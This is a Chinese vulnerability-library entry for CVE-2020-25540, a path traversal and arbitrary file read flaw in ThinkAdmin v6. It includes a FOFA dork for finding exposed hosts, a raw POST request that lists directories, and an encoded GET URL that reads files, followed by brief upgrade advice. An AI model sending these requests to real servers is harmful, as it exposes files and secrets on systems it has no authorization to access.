Thinkadmin v6任意文件读取漏洞(CVE-2020-25540)


title: ‘Thinkadmin v6任意文件读取漏洞(CVE-2020-25540)’
date: Mon, 21 Sep 2020 00:58:07 +0000
draft: false
tags: [‘白阁-漏洞库’]

#### 漏洞信息:

ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统。ThinkAdmin 6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。

#### 影响范围:

Thinkadmin版本小于 ≤ 2020.08.03.01

#### 漏洞复现:

fofa\_dork: “ThinkAdmin” && title”系统登录 · ThinkAdmin”

##### POC:

“`
POST /admin.html?s=admin/api.Update/node HTTP/1.1
Host: xxxxxx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

rules=%5B%22.%2F%22%5D
“`![](/static/baige/01-CMS漏洞/Thinkadmin/https://www.bylibrary.cn/wp-content/uploads/2020/09/微信图片_20200921085600.jpg) 获取版本信息:“`
https://xxxxx/admin.html?s=admin/api.Update/version
“`2、⽂件读取,后⾯那⼀串是UTF8字符串加密后的结果。计算⽅式在Update.php中的加密函数。 /admin.html? s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34 [![](/static/baige/01-CMS漏洞/Thinkadmin/https://www.bylibrary.cn/wp-content/uploads/2020/09/wp_editor_md_502ae6ea9426ef92a5791175b16de552.jpg)](/static/baige/01-CMS漏洞/Thinkadmin/https://www.bylibrary.cn/wp-content/uploads/2020/09/wp_editor_md_502ae6ea9426ef92a5791175b16de552.jpg)

#### 修复方案:

目前厂商已经发布修复相关问题,请受影响用户尽快升级到安全版本

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容